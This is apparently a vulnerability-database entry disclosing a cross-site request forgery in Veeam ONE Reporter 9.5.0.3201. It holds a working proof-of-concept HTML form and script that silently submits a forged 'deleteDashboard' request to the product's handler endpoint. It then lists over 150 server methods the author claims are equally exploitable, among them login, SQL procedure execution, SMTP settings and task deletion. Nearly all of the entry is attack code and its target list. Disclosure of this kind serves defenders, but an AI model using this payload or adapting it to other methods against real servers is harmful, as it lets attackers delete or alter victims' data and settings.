Veeam ONE Reporter 9.5.0.3201 - Multiple Cross-Site Request Forgery

🗓️ 30 Apr 2019 00:00:00Reported by Seyed Sadegh KhatamiType
Veeam ONE Reporter 9.5.0.3201 - Cross-Site Request Forgery allows unauthorized action
# Exploit Title: Veeam ONE Reporter - Cross-Site Request Forgery (All Actions/Methods)
# Exploit Author: Seyed Sadegh Khatami
# Website: https://www.cert.ir
# Date: 2019-04-27
# Google Dork: N/A
# Vendor Homepage: https://www.veeam.com/
# Software Link: https://www.veeam.com/virtual-server-management-one-free.html
# Version: 9.5.0.3201
# Tested on: Windows Server 2016


#exploit:
<form id='del' method='POST' action='https://[target_URL]:1239/CommonDataHandlerReadOnly.ashx'>
  <input name='f'  id='dd'>
</form>

<script>
document.getElementById("dd").value= JSON.stringify({
            id: '1',
            method: 'deleteDashboard',
            params:{ 'id' : 21}
          });
	  
 document.getElementById("del").submit(); 
</script>


##########################################
#all methods is vulnerable
##########################################
#addDashboard(p)
#addDashboardUser(par)
#addDashboardUserList(par)
#applySchedulingForDashboard(dashboardId, taskId, config)
#applySchedulingForFolder(folderId, taskId, config)
#applySchedulingForReport(reportId, taskId, vmr, config)
#canModifyDashboard(id)
#captureContainer(data, taskId)
#changeObjectVisibility(objectId, visible)
#checkForUpdateReportPack(confirm)
#checkIfAdmin()
#checkUserPermissionsResolved(o)
#checkWinVersion()
#clearContainer()
#connectToSqlServer(data, save)
#DBExecuteProcedure(db)
#DBStoreLoad(db)
#DBStoreSave(db)
#deleteDashboard(id)
#deleteDashboardImage(imageId)
#deleteDashboardWidget(p)
#DeleteFolder(param)
#deleteReportPack(name, id, type)
#deleteTask(id)
#doLogin(domain, login, password)
#editDashboard(p)
#emptyDashboardRecycleBin(o)
#findDashboardUsers(p)
#getAboutData()
#getActionParameters()
#getAdvancedData()
#getAlarms()
#getAllSchedulingsForDashboard(info)
#getAllSchedulingsForFolder(info)
#getAllSchedulingsForReport(info)
#getBackUpTree(wsj)
#getBusinessViewTree(wsj)
#getComboData()
#getCommonGridItem()
#getConfiguration()
#getConfigurationOverview(id)
#getConnectedServersGridItem()
#getDashboardData(dashboard_id)
#getDashboardImages(p)
#getDashboardPermissions(p)
#getDashboardPredefiniedReports(p)
#getDashboards(p)
#getDashboardSSRSChartTypes(p)
#getDashboardUserList(p)
#getDashboardWidgetTypeData(p)
#getDefaultUserName()
#getDeletedDashboards(p)
#getEnumeratingTaskContainers(id)
#getEnumeratingTaskProperties(id)
#getEnumeratingTaskScheduling(id)
#getExtensionModules(p)
#getIgnoredDatastores(p)
#getIgnoredDatastoresDetails(p)
#getInfrastructureTree(wsj)
#getIsReporterFreeVersion()
#getJobData(id)
#getLicenseData()
#getLicensedHVSockets(p)
#getLicensedVMSockets(p)
#getMetadata(query, reload)
#getNeedToDisableTabs()
#getNotificationData()
#getObjectsToHide(p)
#getOptionList()
#getReportFilters(param)
#getReportImageName()
#getReportListTreeCheckbox(wsj)
#getReportListTreeDashboard(wsj)
#getReportListTreeWorkspace(wsj)
#getReportManagementTree(wsj)
#getReportsSectionsTree(wsj)
#getReportStatistics(param)
#getScheduleDashboardConfig(dashboardId, taskId)
#getScheduleFolderConfig(folderId, taskId)
#getScheduleReportConfig(reportId, taskId, packType)
#getScriptArgumentList()
#getServerScopeAll(wsj)
#getSessionDetails(idwithtype)
#getSessions(p)
#getSessionsTaskTypes(p)
#getSiteStatusGridItem()
#getSmtpServerData()
#getSqlServerData()
#getSsrsServerData()
#getSSRSStatus()
#getStartStopDeleteButtonsEnabled(id)
#getStatistics()
#getTaskList(p)
#getUpdateSessionInfo(o)
#getvCloudList(p)
#getVideoReportData(interval, intervalPeriod, scope)
#getVmStatus()
#getWidgetCustomChartConstructorData(p)
#getWidgetData(r)
#getWidgetList(item)
#getWidgetPackList(j)
#getWidgetParams(uid)
#getWorkspace()
#getWorkspaceReportGridItems(param)
#isSmtpConfigured()
#publishDashboard(id, publish)
#recalculateProjects(ids)
#removeDashboardUser(par)
#resetReportImageName()
#resetSchedulingForDashboard(dashboardId, taskId)
#resetSchedulingForDashboardArray(dashboardId, taskId)
#resetSchedulingForFolder(folderId)
#resetSchedulingForReport(reportId, vmr)
#resetSchedulingTaskForFolder(folderId, taskId)
#resetSchedulingTaskForReport(reportId, taskId, vmr)
#resetSchedulingTasksForFolderArray(folderId, taskId)
#resetSchedulingTasksForReportArray(reportId, taskId, vmr)
#restoreDashboard(p)
#revokeHost(hostName)
#revokeHostHV(hostName)
#SaveFolder(param)
#saveIgnoredDatastores(taskContainerId, dataStores)
#saveSchedulingInfo(taskId, taskProp)
#saveTask(taskProp, taskContainers, excludes)
#sendNotificationAboutDashboardSharing(to, subject, dashboardName, dashboardUrl, permissionLevel)
#sendTestMessage(data, setting)
#setAdvancedData(measure)
#setComboData(data)
#setDashboardUserPermissions(par)
#setDashboardWidget(p)
#SetDragAndDropPosition(dwid, colIndex, position, height)
#setSchedulingEnability(dashboardId, taskId, disabled)
#setSchedulingEnabilityArray(dashboardId, taskId, disabled)
#setSchedulingEnabilityForFolder(folderId, taskId, disabled)
#setSchedulingEnabilityForFolderArray(folderId, taskId, disabled)
#setSchedulingEnabilityForReport(reportId, taskId, disabled)
#setSchedulingEnabilityForReportArray(reportId, taskId, disabled)
#setSmtpServerData(data)
#setSsrsServerData(data)
#startTask(id)
#stopTask(id)
#system.about()
#    Returns a summary about the server implementation for display purposes.
#system.listMethods()
#    Returns an array of method names implemented by this service.
#system.version()
#    Returns the version server implementation using the major, minor, build and revision format.
#testServer(tcd)
#testSsrsConnection(data)
#updateDashboardPosition(p)
#updateTreeExpandedStates(wsj, a)
#validateTaskName(tcd, id)
##########################################
30 Apr 2019 00:00Current
7.4High risk
Vulners AI Score7.4